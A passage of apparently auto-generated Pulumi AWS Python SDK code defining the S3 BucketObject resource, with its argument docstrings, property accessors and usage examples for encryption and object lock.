pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n :param pulumi.Input[str] version_id: Unique version ID value for the object, if bucket versioning is enabled.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n if acl is not None:\n pulumi.set(__self__, \"acl\", acl)\n if bucket is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"bucket is deprecated: Use the aws_s3_object resource instead\"\"\")\n if bucket is not None:\n pulumi.set(__self__, \"bucket\", bucket)\n if bucket_key_enabled is not None:\n pulumi.set(__self__, \"bucket_key_enabled\", bucket_key_enabled)\n if cache_control is not None:\n pulumi.set(__self__, \"cache_control\", cache_control)\n if content is not None:\n pulumi.set(__self__, \"content\", content)\n if content_base64 is not None:\n pulumi.set(__self__, \"content_base64\", content_base64)\n if content_disposition is not None:\n pulumi.set(__self__, \"content_disposition\", content_disposition)\n if content_encoding is not None:\n pulumi.set(__self__, \"content_encoding\", content_encoding)\n if content_language is not None:\n pulumi.set(__self__, \"content_language\", content_language)\n if content_type is not None:\n pulumi.set(__self__, \"content_type\", content_type)\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if force_destroy is not None:\n pulumi.set(__self__, \"force_destroy\", force_destroy)\n if key is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"key is deprecated: Use the aws_s3_object resource instead\"\"\")\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if kms_key_id is not None:\n pulumi.set(__self__, \"kms_key_id\", kms_key_id)\n if metadata is not None:\n pulumi.set(__self__, \"metadata\", metadata)\n if object_lock_legal_hold_status is not None:\n pulumi.set(__self__, \"object_lock_legal_hold_status\", object_lock_legal_hold_status)\n if object_lock_mode is not None:\n pulumi.set(__self__, \"object_lock_mode\", object_lock_mode)\n if object_lock_retain_until_date is not None:\n pulumi.set(__self__, \"object_lock_retain_until_date\", object_lock_retain_until_date)\n if server_side_encryption is not None:\n pulumi.set(__self__, \"server_side_encryption\", server_side_encryption)\n if source is not None:\n pulumi.set(__self__, \"source\", source)\n if source_hash is not None:\n pulumi.set(__self__, \"source_hash\", source_hash)\n if storage_class is not None:\n pulumi.set(__self__, \"storage_class\", storage_class)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if version_id is not None:\n pulumi.set(__self__, \"version_id\", version_id)\n if website_redirect is not None:\n pulumi.set(__self__, \"website_redirect\", website_redirect)\n\n @property\n @pulumi.getter\n def acl(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n \"\"\"\n return pulumi.get(self, \"acl\")\n\n @acl.setter\n def acl(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"acl\", value)\n\n @property\n @pulumi.getter\n def bucket(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n \"\"\"\n return pulumi.get(self, \"bucket\")\n\n @bucket.setter\n def bucket(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"bucket\", value)\n\n @property\n @pulumi.getter(name=\"bucketKeyEnabled\")\n def bucket_key_enabled(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n \"\"\"\n return pulumi.get(self, \"bucket_key_enabled\")\n\n @bucket_key_enabled.setter\n def bucket_key_enabled(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"bucket_key_enabled\", value)\n\n @property\n @pulumi.getter(name=\"cacheControl\")\n def cache_control(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n \"\"\"\n return pulumi.get(self, \"cache_control\")\n\n @cache_control.setter\n def cache_control(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"cache_control\", value)\n\n @property\n @pulumi.getter\n def content(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n \"\"\"\n return pulumi.get(self, \"content\")\n\n @content.setter\n def content(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content\", value)\n\n @property\n @pulumi.getter(name=\"contentBase64\")\n def content_base64(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n \"\"\"\n return pulumi.get(self, \"content_base64\")\n\n @content_base64.setter\n def content_base64(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_base64\", value)\n\n @property\n @pulumi.getter(name=\"contentDisposition\")\n def content_disposition(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n \"\"\"\n return pulumi.get(self, \"content_disposition\")\n\n @content_disposition.setter\n def content_disposition(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_disposition\", value)\n\n @property\n @pulumi.getter(name=\"contentEncoding\")\n def content_encoding(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n \"\"\"\n return pulumi.get(self, \"content_encoding\")\n\n @content_encoding.setter\n def content_encoding(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_encoding\", value)\n\n @property\n @pulumi.getter(name=\"contentLanguage\")\n def content_language(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Language the content is in e.g., en-US or en-GB.\n \"\"\"\n return pulumi.get(self, \"content_language\")\n\n @content_language.setter\n def content_language(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_language\", value)\n\n @property\n @pulumi.getter(name=\"contentType\")\n def content_type(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n \"\"\"\n return pulumi.get(self, \"content_type\")\n\n @content_type.setter\n def content_type(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_type\", value)\n\n @property\n @pulumi.getter\n def etag(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n \"\"\"\n return pulumi.get(self, \"etag\")\n\n @etag.setter\n def etag(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"etag\", value)\n\n @property\n @pulumi.getter(name=\"forceDestroy\")\n def force_destroy(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n \"\"\"\n return pulumi.get(self, \"force_destroy\")\n\n @force_destroy.setter\n def force_destroy(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"force_destroy\", value)\n\n @property\n @pulumi.getter\n def key(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Name of the object once it is in the bucket.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"kmsKeyId\")\n def kms_key_id(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n \"\"\"\n return pulumi.get(self, \"kms_key_id\")\n\n @kms_key_id.setter\n def kms_key_id(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"kms_key_id\", value)\n\n @property\n @pulumi.getter\n def metadata(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n \"\"\"\n return pulumi.get(self, \"metadata\")\n\n @metadata.setter\n def metadata(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"metadata\", value)\n\n @property\n @pulumi.getter(name=\"objectLockLegalHoldStatus\")\n def object_lock_legal_hold_status(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n \"\"\"\n return pulumi.get(self, \"object_lock_legal_hold_status\")\n\n @object_lock_legal_hold_status.setter\n def object_lock_legal_hold_status(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_legal_hold_status\", value)\n\n @property\n @pulumi.getter(name=\"objectLockMode\")\n def object_lock_mode(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n \"\"\"\n return pulumi.get(self, \"object_lock_mode\")\n\n @object_lock_mode.setter\n def object_lock_mode(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_mode\", value)\n\n @property\n @pulumi.getter(name=\"objectLockRetainUntilDate\")\n def object_lock_retain_until_date(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n \"\"\"\n return pulumi.get(self, \"object_lock_retain_until_date\")\n\n @object_lock_retain_until_date.setter\n def object_lock_retain_until_date(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_retain_until_date\", value)\n\n @property\n @pulumi.getter(name=\"serverSideEncryption\")\n def server_side_encryption(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n \"\"\"\n return pulumi.get(self, \"server_side_encryption\")\n\n @server_side_encryption.setter\n def server_side_encryption(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"server_side_encryption\", value)\n\n @property\n @pulumi.getter\n def source(self) -> Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]:\n \"\"\"\n Path to a file that will be read and uploaded as raw bytes for the object content.\n \"\"\"\n return pulumi.get(self, \"source\")\n\n @source.setter\n def source(self, value: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]):\n pulumi.set(self, \"source\", value)\n\n @property\n @pulumi.getter(name=\"sourceHash\")\n def source_hash(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n \"\"\"\n return pulumi.get(self, \"source_hash\")\n\n @source_hash.setter\n def source_hash(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"source_hash\", value)\n\n @property\n @pulumi.getter(name=\"storageClass\")\n def storage_class(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n \"\"\"\n return pulumi.get(self, \"storage_class\")\n\n @storage_class.setter\n def storage_class(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"storage_class\", value)\n\n @property\n @pulumi.getter\n def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n \"\"\"\n return pulumi.get(self, \"tags\")\n\n @tags.setter\n def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"tags\", value)\n\n @property\n @pulumi.getter(name=\"tagsAll\")\n def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n \"\"\"\n return pulumi.get(self, \"tags_all\")\n\n @tags_all.setter\n def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"tags_all\", value)\n\n @property\n @pulumi.getter(name=\"versionId\")\n def version_id(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Unique version ID value for the object, if bucket versioning is enabled.\n \"\"\"\n return pulumi.get(self, \"version_id\")\n\n @version_id.setter\n def version_id(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"version_id\", value)\n\n @property\n @pulumi.getter(name=\"websiteRedirect\")\n def website_redirect(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n return pulumi.get(self, \"website_redirect\")\n\n @website_redirect.setter\n def website_redirect(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"website_redirect\", value)\n\n\nclass BucketObject(pulumi.CustomResource):\n @overload\n def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None,\n __props__=None):\n \"\"\"\n ## Example Usage\n ### Encrypting with KMS Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplekms = aws.kms.Key(\"examplekms\",\n description=\"KMS key 1\",\n deletion_window_in_days=7)\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n kms_key_id=examplekms.arn)\n ```\n ### Server Side Encryption with S3 Default Master Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"aws:kms\")\n ```\n ### Server Side Encryption with AWS-Managed Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"AES256\")\n ```\n ### S3 Object Lock\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\", object_lock_configuration=aws.s3.BucketV2ObjectLockConfigurationArgs(\n object_lock_enabled=\"Enabled\",\n ))\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_versioning_v2 = aws.s3.BucketVersioningV2(\"exampleBucketVersioningV2\",\n bucket=examplebucket.id,\n versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(\n status=\"Enabled\",\n ))\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"important.txt\"),\n object_lock_legal_hold_status=\"ON\",\n object_lock_mode=\"GOVERNANCE\",\n object_lock_retain_until_date=\"2021-12-31T23:59:60Z\",\n force_destroy=True,\n opts=pulumi.ResourceOptions(depends_on=[example_bucket_versioning_v2]))\n ```\n\n ## Import\n\n Objects can be imported using the `id`. The `id` is the bucket name and the key together e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object some-bucket-name/some/key.txt\n ```\n\n Additionally, s3 url syntax can be used, e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object s3://some-bucket-name/some/key.txt\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n ...\n @overload\n def __init__(__self__,\n resource_name: str,\n args: BucketObjectArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n \"\"\"\n ## Example Usage\n ### Encrypting with KMS Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplekms = aws.kms.Key(\"examplekms\",\n description=\"KMS key 1\",\n deletion_window_in_days=7)\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n kms_key_id=examplekms.arn)\n ```\n ### Server Side Encryption with S3 Default Master Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"aws:kms\")\n ```\n ### Server Side Encryption with AWS-Managed Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"AES256\")\n ```\n ### S3 Object Lock\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\", object_lock_configuration=aws.s3.BucketV2ObjectLockConfigurationArgs(\n object_lock_enabled=\"Enabled\",\n ))\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_versioning_v2 = aws.s3.BucketVersioningV2(\"exampleBucketVersioningV2\",\n bucket=examplebucket.id,\n versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(\n status=\"Enabled\",\n ))\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"important.txt\"),\n object_lock_legal_hold_status=\"ON\",\n object_lock_mode=\"GOVERNANCE\",\n object_lock_retain_until_date=\"2021-12-31T23:59:60Z\",\n force_destroy=True,\n opts=pulumi.ResourceOptions(depends_on=[example_bucket_versioning_v2]))\n ```\n\n ## Import\n\n Objects can be imported using the `id`. The `id` is the bucket name and the key together e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object some-bucket-name/some/key.txt\n ```\n\n Additionally, s3 url syntax can be used, e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object s3://some-bucket-name/some/key.txt\n ```\n\n :param str resource_name: The name of the resource.\n :param BucketObjectArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(BucketObjectArgs, pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.__dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] 